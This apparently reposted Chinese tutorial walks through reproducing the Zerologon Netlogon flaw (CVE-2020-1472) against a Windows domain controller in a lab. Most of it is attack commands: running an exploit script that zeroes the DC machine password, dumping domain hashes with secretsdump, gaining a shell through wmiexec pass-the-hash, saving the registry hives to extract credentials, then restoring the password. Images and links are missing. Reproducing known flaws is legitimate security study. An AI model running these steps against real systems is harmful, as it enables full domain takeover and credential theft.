Netlogon特权提升漏洞CVE 2020-1472该如何复习

发布时间:2021-12-28 17:18:35 作者:柒染
来源:亿速云 阅读:133

Netlogon特权提升漏洞CVE 2020-1472该如何复习,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

1.复现环境

DC:
os:windows 2012 server
ip:192.168.236.132

攻击机:
os:kali
ip:192.168.236.130

2.影响版本

Windows Server 2008 R2 for x64-based Systems
Service Pack 1Windows Server 2008 R2 for x64-based
Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

3.域控环境搭建参考文章

sectool/251828.html

4.复现过程

4.1 漏洞验证

POC链接

Netlogon特权提升漏洞CVE 2020-1472该如何复习

Netlogon特权提升漏洞CVE 2020-1472该如何复习

4.2 漏洞利用

安装最新的Impacket,否则会报错

Netlogon特权提升漏洞CVE 2020-1472该如何复习

4.2.1 下载攻击exp

EXP下载

Netlogon特权提升漏洞CVE 2020-1472该如何复习

4.2.2 置空密码

python3 cve-2020-1472-exploit.py WIN-F6STUQIU7D8 192.168.236.132

Netlogon特权提升漏洞CVE 2020-1472该如何复习

4.2.3 获取hash

进入到impacket/examples

python3 secretsdump.py DOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132 -just-dc -no-pass

Netlogon特权提升漏洞CVE 2020-1472该如何复习

4.2.4 获取shell

python3 wmiexec.py -hashes <HASH> DOMAIN/administrator\@IP

Netlogon特权提升漏洞CVE 2020-1472该如何复习

4.2.5 获取原hash

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

Netlogon特权提升漏洞CVE 2020-1472该如何复习

4.2.6 解析hash

保存$MACHINE.ACC部分:XXXXXXXXXXXXXX:XXXXXXX

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

4.2.7 恢复hash

恢复链接

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

Netlogon特权提升漏洞CVE 2020-1472该如何复习

4.2.8 验证是否恢复

使用获取hash的命令来验证是否恢复

python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

Netlogon特权提升漏洞CVE 2020-1472该如何复习

5.修复建议

官方修复建议

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

推荐阅读:
  1. 关于Microsoft Exchange Server 特权提升漏洞处理方法
  2. iOS优化内存,提升性能 之一

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

netlogon

上一篇:fabric go sdk是什么

下一篇:Fabric区块链官方浏览器怎么用

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》